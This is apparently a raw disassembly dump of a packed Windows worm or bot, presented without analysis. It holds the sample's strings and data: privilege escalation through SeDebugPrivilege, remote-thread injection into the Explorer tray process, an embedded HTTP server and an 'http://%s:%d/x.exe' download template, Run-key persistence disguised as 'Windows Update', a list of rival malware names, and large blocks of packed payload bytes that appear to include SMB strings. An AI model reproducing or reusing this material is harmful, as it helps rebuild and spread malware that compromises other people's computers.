aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_30901D20+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_30901D20+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_30901D20+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_30901D20+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_30901D20+8�o
; sub_3090235D+DE�o
align 4
aUterm14 db 'uterm14',0 ; DATA XREF: sub_30901DA8:loc_30901E8D�o
; UPX0:309022FC�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_30901DA8+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_30901DA8:loc_30901DEF�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_30901DA8+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_30901DA8+18�o
align 10h
dword_30904D70 dd 0E9F3F5h ; DATA XREF: sub_30902036+105�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_30902036+F9�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_30902036+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_30902036+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_30902036+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:309022E7�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_3090235D+E5�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_3090235D+D7�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_3090235D+D0�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_3090235D+C3�o
align 4
aU14 db 'u14',0 ; DATA XREF: sub_3090235D+B1�o
aU13 db 'u13',0 ; DATA XREF: sub_3090235D+A5�o
aU12 db 'u12',0 ; DATA XREF: sub_3090235D+99�o
aU11 db 'u11',0 ; DATA XREF: sub_3090235D+8D�o
aU10 db 'u10',0 ; DATA XREF: sub_3090235D+81�o
aU9 db 'u9',0 ; DATA XREF: sub_3090235D+75�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_3090235D+69�o
align 10h
aU13x db 'u13x',0 ; DATA XREF: sub_3090235D+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_3090235D+51�o
align 10h
aU11x db 'u11x',0 ; DATA XREF: sub_3090235D+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_3090235D+3B�o
align 10h
aU14x db 'u14x',0 ; DATA XREF: sub_3090235D+22�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_3090266F+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_3090216F+23�o
; sub_30902943+5F�o ...
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_3090216F+1C�o
; sub_309029F1+87�o ...
align 4
aDuoelmgljwhgut db 'duoelmgljwhgutvml',0 ; DATA XREF: sub_309015C7+4F�o
; sub_30902ABD+57�o ...
align 10h
dd 0
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_30902ABD+32�o
aClient db 'Client',0 ; DATA XREF: sub_30902ABD+BC�o
; sub_30902ABD+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_30902ABD+37�o
; sub_30902ABD+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_30902943+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_30902943+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_30902943+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_30902943+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_30902943+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_30902943+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_30902943+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_30902943+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_30902943+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_30902943+F�o
align 4
a1: ; DATA XREF: sub_30902ABD+B7�o
unicode 0, <1>,0
dd 8 dup(0)
dword_30904FC8 dd 0 ; DATA XREF: sub_30902036+C7�r
; sub_3090216F+80�w
dword_30904FCC dd 0 ; DATA XREF: sub_309015C7+43�r
; sub_3090216F+2D�w
dword_30904FD0 dd 0 ; DATA XREF: sub_30902036+79�r
; sub_30902036:loc_309020E4�r ...
dword_30904FD4 dd 44h ; DATA XREF: sub_30901DA8+C2�r
; UPX0:30902307�w ...
dword_30904FD8 dd 0 ; DATA XREF: sub_30902349+2�r
; sub_3090235D+33�w
dword_30904FDC dd 0 ; DATA XREF: sub_3090216F+E0�w
; sub_3090266F+20�r
dword_30904FE0 dd 30900000h ; DATA XREF: sub_30901DA8+6�r
; UPX0:309022EC�w
dword_30904FE4 dd 0 ; DATA XREF: sub_309015C7+49�r
; sub_30902520+37�o ...
dword_30904FE8 dd 0 ; DATA XREF: UPX0:3090270C�w
; UPX0:3090271E�w
word_30904FEC dw 0 ; DATA XREF: sub_309024BC+3B�r
; sub_30902520:loc_30902581�r ...
align 10h
dword_30904FF0 dd 0 ; DATA XREF: sub_30902ABD+25�w
; sub_30902ABD+110�w
align 10h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 30905000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30905000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:30906B01�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 65746E49h, 636F6C72h, 4964656Bh
dd 6572636Eh, 746E656Dh, 72430100h, 65746165h, 6E657645h
dd 1004174h, 74696157h, 53726F46h, 6C676E69h, 6A624F65h
dd 746365h, 69725701h, 69466574h, 100656Ch, 736F6C43h
dd 6E614865h, 656C64h, 65724301h, 46657461h, 41656C69h
dd 736C0100h, 656C7274h, 100416Eh, 7274736Ch, 41746163h
dd 65470100h, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 47010041h, 6F4C7465h, 656C6163h, 6F666E49h, 53010041h
dd 7065656Ch, 736C0100h, 70637274h, 416E79h, 74654701h
dd 72727543h, 50746E65h, 65636F72h, 1007373h, 50746547h
dd 41636F72h, 65726464h, 1007373h, 64616F4Ch, 7262694Ch
dd 41797261h, 72570100h, 50657469h, 65636F72h, 654D7373h
dd 79726F6Dh, 704F0100h, 72506E65h, 7365636Fh, 47010073h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 74654701h
dd 6B636954h, 6E756F43h, 43010074h, 74616572h, 74754D65h
dd 417865h, 65724301h, 54657461h, 61657268h, 43010064h
dd 74616572h, 6F725065h, 73736563h, 53010041h, 76457465h
dd 746E65h, 65704F01h, 6576456Eh, 41746Eh, 69784501h, 72685474h
dd 646165h, 61655201h, 6C694664h, 47010065h, 69467465h
dd 6953656Ch, 100657Ah, 74697845h, 636F7250h, 737365h
dd 74654701h, 7473614Ch, 6F727245h, 44010072h, 74656C65h
dd 6C694665h, 4165h, 0D1h, 0
dd 67655201h, 61657243h, 654B6574h, 41784579h, 65520100h
dd 74655367h, 756C6156h, 41784565h, 65520100h, 65755167h
dd 61567972h, 4565756Ch, 1004178h, 4F676552h, 4B6E6570h
dd 78457965h, 52010041h, 65446765h, 6574656Ch, 756C6156h
dd 1004165h, 43676552h, 65736F6Ch, 79654Bh, 6F624101h
dd 79537472h, 6D657473h, 74756853h, 6E776F64h, 43010041h
dd 74707972h, 61657243h, 61486574h, 1006873h, 70797243h
dd 73614874h, 74614468h, 43010061h, 74707972h, 69726556h
dd 69537966h, 74616E67h, 41657275h, 72430100h, 44747079h
dd 72747365h, 6148796Fh, 1006873h, 70797243h, 73654474h
dd 796F7274h, 79654Bh, 79724301h, 65527470h, 7361656Ch
dd 6E6F4365h, 74786574h, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 70797243h, 706D4974h
dd 4B74726Fh, 7965h, 0DEh, 0E8h, 61727301h, 100646Eh, 636D656Dh
dd 1007970h, 6C727473h, 1006E65h, 736D656Dh, 1007465h
dd 646E6172h, 655F0100h, 70656378h, 61685F74h, 656C646Eh
dd 1003372h, 73727473h, 1007274h, 63727473h, 7268h, 0E9h
dd 10Ch, 6E694601h, 6E695764h, 41776F64h, 65470100h, 726F4674h
dd 6F726765h, 57646E75h, 6F646E69h, 47010077h, 69577465h
dd 776F646Eh, 65726854h, 72506461h, 7365636Fh, 644973h
dd 70737701h, 746E6972h, 4166h, 0F4h, 120h, 746E4901h
dd 656E7265h, 65704F74h, 6C72556Eh, 49010041h, 7265746Eh
dd 4F74656Eh, 416E6570h, 6E490100h, 6E726574h, 6C437465h
dd 4865736Fh, 6C646E61h, 49010065h, 7265746Eh, 4774656Eh
dd 6F437465h, 63656E6Eh, 53646574h, 65746174h, 6E490100h
dd 6E726574h, 65527465h, 69466461h, 656Ch, 100h, 138h
dd 0FF0073FFh, 0DFF0002h, 1FF00h, 0FF0039FFh, 34FF006Fh
dd 17FF00h, 0FF000CFFh, 4FF0009h, 13FF00h, 0FF0010FFh
dd 3FF0016h, 0
dd 45500000h, 14C0000h, 0D7C0002h, 40D2h, 0
dd 0E00000h, 10B010Fh, 24000006h, 10000000h, 0
dd 22DF0000h, 10000000h, 40000000h, 0
db 90h
db 30h, 0, 10h
dd 2000000h, 40000h, 0
dd 40000h, 0
dd 50000000h, 4000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 2C940000h, 8C0000h, 14h dup(0)
dd 10000000h, 1780000h, 6 dup(0)
dd 742E0000h, 747865h, 239C0000h, 10000000h, 24000000h
dd 4000000h, 3 dup(0)
dd 200000h, 642EE004h, 617461h, 0FF40000h, 40000000h, 10000000h
dd 28000000h, 3 dup(0)
dd 400000h, 4000C000h, 2E980000h, 44AE0000h, 194D0000h
dd 9EC0874Ah, 0A0A00291h, 5D021633h, 30D2B73h, 1A73D7Dh
dd 6C769F68h, 0E676436Eh, 0CC3A4A58h, 731B5AB7h, 0E0CDC87Bh
dd 706A7684h, 8E96F42Ah, 0C4480E6Ch, 0A5EC860h, 0E1B29764h
dd 847A3273h, 3FA22800h, 0B66C4B38h, 6C3C5D9Bh, 9810FCB2h
dd 0C8EF7AE2h, 0DC0167A9h, 877E500Fh, 0E3185A05h, 0C00D9870h
dd 0C8636271h, 8C9D328h, 0B9B21827h, 7A04E59Dh, 4C30DB0Ch
dd 45221B21h, 1CD62DC5h, 0CD24BFDBh, 0DE402E2Fh, 0DE4441A8h
dd 212DB09Ch, 504440BCh, 358CDBDEh, 1E101B64h, 970D94B7h
dd 0D64EFFBAh, 0ACF98121h, 0A580E87Ch, 96001624h, 6D9FA7Ch
dd 1C526825h, 67761C9Dh, 12C1C962h, 0EF1D96F4h, 7A70D92Ch
dd 7C6A4C0Ah, 49447BC8h, 78F0F926h, 547BC9BEh, 4BB790E1h
dd 0E9244776h, 2449C49Fh, 1EDCF78h, 483330D9h, 0CC0CF882h
dd 154B0B08h, 7A0266F4h, 6A17436Ch, 5E7008C6h, 845FF42Ch
dd 0A3E26D3Ch, 1C541C09h, 0FA4204Dh, 7F0FBFBAh, 0F805A035h
dd 57120868h, 616C9F37h, 5A745703h, 0F80E4C14h, 74684B74h
dd 0D893128Bh, 3D748682h, 7096967Eh, 412081E5h, 0FC55FF9Ch
dd 0D859ED73h, 0E4B9E80Fh, 9628AC50h, 5BABF4D5h, 702F00Eh
dd 9F855h, 0B303B13Bh, 7558E48Ch, 71870CF4h, 1807C4C8h
dd 9DE00D8Bh, 0FBBFED61h, 418BE72Fh, 0C103573Ch, 8B846468h
dd 788B3448h, 0F44D8950h, 0F9818AA0h, 68D8B092h, 946BD854h
dd 0F0AD966Ah, 12698A01h, 2F86B1C1h, 0DED74ECh, 110CD730h
dd 8DB26A74h, 10090E82h, 859176DBh, 0F84DA96Fh, 14185051h
dd 0A02A6897h, 412C6C51h, 0AAF85DACh, 0CAE96344h, 0D4346B03h
dd 0EB9BB60Ch, 59AB57B3h, 7C7DF055h, 0E8DDB3CFh, 3E457476h
dd 50E951F0h, 4FA83153h, 5F0B67B8h, 17FAD6D4h, 89FF536Ah
dd 5577D007h, 74C73BECh, 0C7851005h, 1BEB6AD8h, 0E684D77h
dd 0C0E59DDh, 0FCCDB9CDh, 807EB05h, 0EE49EF74h, 9D521E2h
dd 0E7515117h, 4B310F60h, 69191A14h, 0B4250D14h, 220DB42Bh
dd 13B1AFDDh, 0B1133AB2h, 590FE8AEh, 6AF9C22Dh, 0E99EDC4Bh
dd 803CB8B6h, 50A8500Ch, 12774D61h, 0BC2C507Dh, 459F195Dh
dd 7C204BA4h, 7C8B5743h, 0C5A8DC58h, 0C9981424h, 5684177Eh
dd 1A33FFFFh, 8861C280h, 3B461E14h, 80E97CF7h, 44003B24h
dd 4D5D6DBCh, 2E444354h, 57AC5A5Fh, 53018156h, 8766DB67h
dd 0EED8892Fh, 0F0DC73D2h, 56501950h, 403CAA00h, 77AC6E13h
dd 0F405C095h, 38F6B6E8h, 0CFA6849h, 6CC7FFF0h, 8C9B699h
dd 2ACC3434h, 9AD7482Eh, 0A759ED9h, 20BC4C0Ah, 13E1601Ah
dd 0C650183Ah, 3B7FB807h, 0DADF1C01h, 0C402C17h, 801008Bh
dd 24448D51h, 59B6135Fh, 112C21ECh, 245903D3h, 4EAD09DDh
dd 7BB7F07h, 78FFC420h, 332F0E86h, 0C1F8C8E4h, 0CF3610E7h
dd 0B856CC8h, 8B02006Eh, 8E01C85Dh, 0AB33121Ah, 1D5920C1h
dd 537C7AE0h, 0DAAF67C6h, 1E119B33h, 68250845h, 86009AD0h
dd 0E700E5E4h, 3B072033h, 422817C3h, 67719888h, 98643536h
dd 0B7A4683Dh, 0DD8CD8B0h, 474FD044h, 0A54D8CFEh, 366E1662h
dd 654DA14h, 7CE9DD7Eh, 33A13400h, 0B77900B9h, 2BFF75DBh
dd 72C13BC7h, 0E1C18B02h, 0C8A12949h, 23C70318h, 0B94B7F12h
dd 233D84ACh, 786A2F72h, 0D19E146Dh, 0C4EB3DF8h, 9343E113h
dd 8793C9BBh, 0B746815h, 67706803h, 8A58B36Dh, 47532D2Fh
dd 8FA31153h, 0CC764559h, 24668F17h, 4C28BF8h, 0E75730CEh
dd 0B6090FA9h, 0B3D0A4AFh, 994E9C68h, 0F743753Bh, 68066C68h
dd 1D89805Bh, 25D42791h, 0DB17B6DAh, 0C7B314DFh, 0CC1300F2h
dd 533CF6B6h, 3A01027Bh, 0AD468E96h, 0ED6A8049h, 34A36740h
dd 22741A6Bh, 0DE97D4C0h, 0FFA3BD59h, 97F1A310h, 0B67453FCh
dd 495184C6h, 0FD03A79h, 5BB62337h, 5EEC2656h, 169A840Ch
dd 10C254BEh, 56B35EF8h, 0A5E93B3Eh, 89E80C99h, 500EC5Dh
dd 7DD837FFh, 1FFF25FBh, 0A3C33A04h, 0E77443DCh, 57CC8A12h
dd 84FA126Fh, 50DF74C9h, 0A42EA5Eh, 0C6616E99h, 6458983Ch
dd 6BE8400Ch, 5F6E0AFAh, 1FD807F8h, 0A472F644h, 366891FEh
dd 60FEA20h, 0CF53E2EBh, 70A12E60h, 9043455Fh, 0B30EBDD6h
dd 38A17001h, 11D6B033h, 6DA1E983h, 0D6D9023Eh, 0D8CC802Dh
dd 68B0CD86h, 0E0A3ABE8h, 0EC6E0E0h, 6E7C1158h, 0DC1AD4A3h
dd 6C304ECFh, 4552B73Dh, 1C0D29D8h, 766FB382h, 1A3F1904h
dd 235D68B9h, 7DAFA413h, 0DEBE61A2h, 99591379h, 0D5830469h
dd 44D835D8h, 1C402C74h, 3A9C812Bh, 5068C388h, 3AB16CD7h
dd 70388FF3h, 57FD43A3h, 0FC08ADEEh, 0D7184868h, 2404C702h
dd 0C80C8040h, 30380B80h, 0C9E69019h, 28DD0E2Ch, 90190124h
dd 421C2001h, 1890190Fh, 2C395914h, 0FC1F30EDh, 0C683974h
dd 0E9A4504Eh, 4E4C4E04h, 0FC068E46h, 0B3F41C4Dh, 4C242EDBh
dd 0DFAF120Ah, 1115216Fh, 0ECB724E4h, 0CB169C0Ah, 78EC2C26h
dd 4540E730h, 0AA571411h, 43C06718h, 4E1388FAh, 14F6E3EBh
dd 8501848Eh, 7F261B7h, 636C023h, 7FA48008h, 0BD875152h
dd 458AE155h, 0FF0F510Bh, 3A52DB32h, 1F4DD2F8h, 31ECEC42h
dd 25DE5D38h, 0C0B5D88h, 2F847F70h, 0B70FB507h, 47A4EC35h
dd 0FE033FF1h, 3FEF799h, 0C3FE30D6h, 72FFFB80h, 0B5265EBDh
dd 626C96CBh, 0EB65F76h, 1404EC99h, 4F586833h, 15B0C099h
dd 0D0A8108h, 0CCC31D45h, 530B09B6h, 7532756Ch, 826C64B6h
dd 24BC560Fh, 7A3D89DEh, 3276B790h, 0D703FF84h, 31FB8143h
dd 0D55436F9h, 875F9F3Bh, 59AE995Dh, 737B30ACh, 25B6A20Ch
dd 2F8B5CF0h, 6BFD73A5h, 4F9E2DEh, 3C9BFEFFh, 6BF7887Fh
dd 0F1B16D87h, 3B558BADh, 3EAADC98h, 62CEC9D8h, 9E57A0A3h
dd 729C572Fh, 7B08967Bh, 201359F8h, 4ADC4B25h, 0B360FF0Ch
dd 6897EE75h, 0C3591D87h, 0D3A62710h, 849ED3BEh, 8183012Ch
dd 2A9D270h, 260E5AC6h, 8F74BD4Eh, 16D7A750h, 68BA7E03h
dd 0F6D4FEA4h, 0DCDF03CCh, 25B0030Bh, 9BB02037h, 1110E04Eh
dd 0AC077DD9h, 6C42F2DEh, 0B80C6AEh, 6C2C0BDFh, 5550EB32h
dd 36579356h, 0C0263CE4h, 51B8E63Bh, 34330E26h, 0FD1F0CA5h
dd 776C07F4h, 5314C483h, 20BF606h, 0E838506Ah, 0D5B7FB5Eh
dd 0D205DE5Dh, 18740096h, 0E60E1109h, 10A6871Ah, 141905h
dd 13BB0A27h, 1606D84Fh, 2C62AA6Bh, 74E103B6h, 0C7D5530Dh
dd 1BB61051h, 3942034Ah, 0ED3A674Ch, 3987B685h, 117EEDE0h
dd 4D591709h, 60C9EF14h, 596C3BBh, 0DF2EBA2h, 0C583B475h
dd 0DDEB652Dh, 1B3F689Fh, 4C0B0646h, 150C3BC0h, 0B11B3BEh
dd 8106E4Eh, 38174714h, 0DB51D42Ch, 0B0A15618h, 0DC0B65B1h
dd 563EF618h, 0C6219C3Dh, 2ADC74B8h, 9659619Eh, 50780B6Eh
dd 8181020h, 3816C5F8h, 0F5E5C03h, 0B5C68B55h, 86B310AEh
dd 2C562E9Eh, 9D932030h, 555653h, 0B59CB227h, 520ACA58h
dd 0C59E040Ch, 5D0C0724h, 0C5012854h, 53418707h, 0E24ED3DEh
dd 0C62E0FEDh, 3CE6948Eh, 4E365C1Eh, 17ADF779h, 8BA9F07Ch
dd 0C1A4D288h, 7ADE2592h, 0D8FF3568h, 0ECC562F4h, 209810A6h
dd 9EEF836h, 7D821C2Ch, 1E748D47h, 0FEFC2D01h, 5678ACC0h
dd 0FF1CD0A5h, 20B9E0B5h, 0EA45F46Fh, 521F0FFFh, 0B33361C3h
dd 46506008h, 0A070767Ch, 89BD5733h, 0C80638B7h, 0FBDB1CDh
dd 3C757D0h, 0D4062488h
dd 72391C74h, 0DC5CD8E4h, 0E448E050h, 4723CF3Ch, 0EC24E88Eh
dd 4EFCF018h, 3269A2F4h, 7DB0EC98h, 0C2C7BF0Ah, 0BE0FF9C4h
dd 188B29A4h, 16C8A345h, 1752C8DBh, 1D97B06Ch, 0A60E1775h
dd 64D40B1Dh, 871869AAh, 0B6418337h, 0A4609B75h, 78813648h
dd 45097408h, 0AD08C43Fh, 6A88F7E0h, 0BB381363h, 84673498h
dd 0A7951BA1h, 0E083FC13h, 5C08303h, 102752F5h, 53170D72h
dd 0DCB010C8h, 3DDC8B3Bh, 0E26D65Dh, 0CC387B30h, 50E13814h
dd 0DE2CC561h, 20404059h, 0FB9598ECh, 34ABEA96h, 0D9F24C6h
dd 4184B366h, 1F45414h, 424BA61Eh, 84D80763h, 2B2C562Eh
dd 0DBC56DF5h, 1F7D8305h, 0F714C748h, 8452F025h, 51802FEFh
dd 501D6AE0h, 0E871C4BFh, 81EA4151h, 37743F30h, 70AFECCFh
dd 0FDBB0AC5h, 5352D159h, 7306C5F4h, 53BC9645h, 0F735ED3Dh
dd 0EBB138ECh, 32CE590Fh, 20B2DB6h, 0E271689Dh, 81C6A350h
dd 0CCBB2665h, 3596CDC2h, 0BB46E062h, 6B050B9h, 68ED67FAh
dd 4EC6125Eh, 0E7A12696h, 0BBC6314Ch, 0F090CCB6h, 0AE2CFD3Bh
dd 18B790F0h, 0C480741h, 188015EBh, 0CD60B62Dh, 729A1E09h
dd 0FBEFB764h, 5B44330Ch, 0EEA783ECh, 136A7668h, 0F7364011h
dd 0CC3D85h, 15FC25FFh, 661DF405h, 0ECF04646h, 2FBE511Fh
dd 8D4348D4h, 8114729Bh, 0F52D0BE9h, 4FD8FEDh, 73170185h
dd 8BC82BECh, 0E18B0CC4h, 8C8D088Bh, 4926F74h, 644FC350h
dd 1540585Ch, 498D84h, 0A8A300h, 0C56DF18Bh, 206CD2Fh
dd 41535224h, 1398031h, 0DFFFFFFFh, 838DF501h, 0EC527911h
dd 0F63AE42Ah, 0EA9B49E7h, 21AFBEE0h, 95447EDBh, 32615E1Ah
dd 0FD0185A0h, 6A1FFFFFh, 94FF949Fh, 26A68439h, 1DCE358Fh
dd 0BC9A55Ch, 72657AB2h, 0FFFFFFFFh, 7A6F4DB3h, 616C6C69h
dd 302E342Fh, 6F632820h, 7461706Dh, 656C6269h, 534D203Bh
dd 0FFEE4549h, 3620DADFh, 69570915h, 776F646Eh, 544E2073h
dd 312E3520h, 0F9A66F29h, 381CA0DDh, 0FC040C01h, 0F3CFEC41h
dd 0D800DF7Ch, 0B80EC809h, 3C90A0ACh, 803CF7CFh, 5C680474h
dd 0CF3CF354h, 203444F3h, 42FF0810h, 40FCE699h, 7465C2F0h
dd 64726168h, 0EDF6FE2Eh, 7A6962F6h, 6B630800h, 6C2E73BAh
dd 76631776h, 75722E76h, 0DE5EDB1Eh, 77777707h, 0A76C6465h
dd 6F6C0F65h, 0BFDF6F76h, 6F670ADDh, 736F6830h, 6B732E74h
dd 65E566E7h, 0DFDA6573h, 63456EC6h, 1E002268h, 6E65646Ch
dd 0DFDA6173h, 0FCF6BDAh, 9577566h, 6B6EEBFFh, 3B5B2E69h
dd 726FFF6Bh, 72740067h, 1F206A6Fh, 6B3A3C61h, 0B196DE19h
dd 746D0C61h, 2E782D83h, 6B6DB32Fh, 71065BEDh, 6B2A620Eh
dd 0B676FD2Bh, 276266Dh, 5630B7Ah, 2E706F74h, 0B65B9B6Eh
dd 5B69178Dh, 0B56B2773h, 2DF85B78h, 757A0F60h, 652D746Ch
dd 0A1176983h, 5B5876B5h, 0C2BA8D6Bh, 0F8560395h, 694F915Eh
dd 0FF00329Fh, 78EFDA16h, 6A2C6177h, 256262h, 66617A9Bh
dd 6DF09161h, 5D2EA867h, 0E75C2365h, 0F0BFF6Eh, 23636261h
dd 69686766h, 6D6C6B6Ah, 7271C56Eh, 0DFC6FFFFh, 777675F7h
dd 8C7A7978h, 44434241h, 48474645h, 4C4B4A49h, 0F4F4E4Dh
dd 50CBFDA3h, 56555451h, 5A595857h, 74685B1Bh, 0FEC0EE6Fh
dd 2F3A7074h, 0B73252Fh, 2E97652Fh, 0EDB56870h, 3F70C2DBh
dd 3F0F3D0Eh, 66E6373h, 0DB720C64h, 6E7AFB7h, 313D3B76h
dd 74133F34h, 760F6B1Bh, 58EBD890h, 3732313Dh, 0C8D801A8h
dd 3A31BFBEh, 2F303038h, 0DFDF65h, 0FFFDB6E8h, 335DDF0Fh
dd 0EEB966C9h, 5758D01h, 68AFE8Bh, 4607993Ch, 0FE894606h
dd 46302CFFh, 7889934h, 0EBEDE247h, 60DAE80Ah, 7FEDFF57h
dd 2E6765FFh, 0C9999371h, 0BDFD1201h, 716FD91h, 0AA6872C1h
dd 0AA66FD42h, 0FEFF75BBh, 14BA10FDh, 1A98A91Ch, 0F198F3C9h
dd 71028608h, 3FB010C0h, 5F901FFBh, 599237CBh, 3A781C96h
dd 7157E414h, 0DBEF0A7Dh, 713AF93Eh, 0F19DF345h, 0F1098904h
dd 0D23FD804h, 40119CB9h, 0E3F367B3h, 0DC1C10F0h, 0DEFF630Bh
dd 6059B2EEh, 125C99Bh, 0A10414D9h, 6461CA17h, 9E71D8F9h
dd 61688D2Bh, 0E21AAD91h, 7B3ED6F6h, 28111D96h, 0C850B2h
dd 57DC1499h, 0FEDDED55h, 4E1225D9h, 1291C0A4h, 0F7ED9949h
dd 0DDD80054h, 0C414FECFh, 71CBCA3Ah, 24FF1C3Bh, 0CF1A21E4h
dd 0FF8FCDCDh, 667B36C9h, 1E3F812Ch, 83B8B0FBh, 0DB12CDC3h
dd 5DBB66F9h, 1DCBC9A8h, 0B24AD25h, 27F64C9Fh, 96A6485Ah
dd 4C1B14C0h, 3F7DA729h, 0F3EBECBBh, 16E9BA9Ch, 7126F434h
dd 7766FCF5h, 0F90E9FFFh, 29EF133Bh, 5F376B46h, 0EC4766DEh
dd 1016ADA8h, 1FFFEF6h, 0EDFFC5B7h, 0FDE9ECE9h, 2CE1FCB7h
dd 0BFDBFF01h, 0FCF5CAFBh, 0FCF25AFCh, 0F5FCF7EBh, 0C7D6ABAAh
dd 59AAF934h, 2A2A25B4h, 0FE5FF67Fh, 93ACC966h, 90B78190h
dd 0C983639Dh, 309271CDh, 513519BFh, 0EEC20F14h, 0A95D90Bh
dd 712A9172h, 0A5D2EBC8h, 0FFB46F12h, 0E180D5FFh, 6FAA529Ah
dd 9A2A8D14h, 8B12B9C8h, 0C3474A9Ah, 0DB9BAB9Eh, 0DBEDFFFFh
dd 0EC20A319h, 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h
dd 0B0961FBDh, 2EFFFCD0h, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 0D096F810h, 9FFBB6F6h, 7F664922h, 8712FEFDh, 95C25AA9h
dd 82128502h, 0B4067F04h, 0CB5A91EDh, 85B7CFF7h, 424D53FFh
dd 9B909CFFh, 0C8531872h, 62FEFFh, 35435002h, 834BFFFEh
dd 4F575445h, 50204B52h, 52474F52h, 31204D41h, 0D6290ECDh
dd 414C17BEh, 0A024D4Eh, 75BB66ABh, 0B715B52Bh, 0AA676B03h
dd 4B0E7075h, 33696EB7h, 4D27611Ah, 21583223h, 0F2A66D32h
dd 2E323261h, 2018D631h, 35833C8Ch, 0A48B323Ch, 5DBE0773h
dd 0CFA95A8h, 40023FFh, 0AA5D0A11h, 2014C1B1h, 6982D405h
dd 0E887F000h, 534B4CADh, 97EF5053h, 81E00882h, 82491EDFh
dd 6E240057h, 6F006400h, 36C5ED9Dh, 3A730077h, 9013074h
dd 896DCC8Ch, 350039ECh, 72E1D23h, 0C89CF200h, 8ABDA06h
dd 0C938DA20h, 9F570324h, 6C190003h, 462A93B0h, 40074723h
dd 1E46E7Fh, 10060006h, 8A151F01h, 14BFFF88h, 48E0FDh
dd 3644004Fh, 0F27A6A19h, 281C49E4h, 742530AFh, 1137C810h
dd 0E15367D8h, 9A75DF5Ch, 3053CB6Bh, 75C0400h, 77235ABDh
dd 5C08EBDDh, 72E4D61h, 2E380036h, 6376D8B9h, 491B3077h
dd 2043EC00h, 0B3B0E790h, 64633F00h, 96DFF2A2h, 4DC080Fh
dd 0FF1640h, 0E00DEDEh, 21301600h, 19F0F61h, 34402602h
dd 289BF7DCh, 8B110319h, 0BE74D96Ch, 0D36C1ACBh, 9C2A9B70h
dd 0DB3D256Bh, 109F4296h, 0D604480Eh, 1B81DD75h, 5A541354h
dd 22596326h, 0DCFB9FF3h, 45CBC75Ch, 58765h, 5F10030Bh
dd 48483DECh, 0EB810B8h, 0FE6A050Bh, 28FFFEC7h, 0B10C3919h
dd 0A89B11D0h, 0D94FC000h, 5D5FF52Eh, 1CEB8A88h, 0E89F11C9h
dd 17D97B22h, 48102B3Ch, 0F40CD160h, 0C95E43A3h, 0CA060E7h
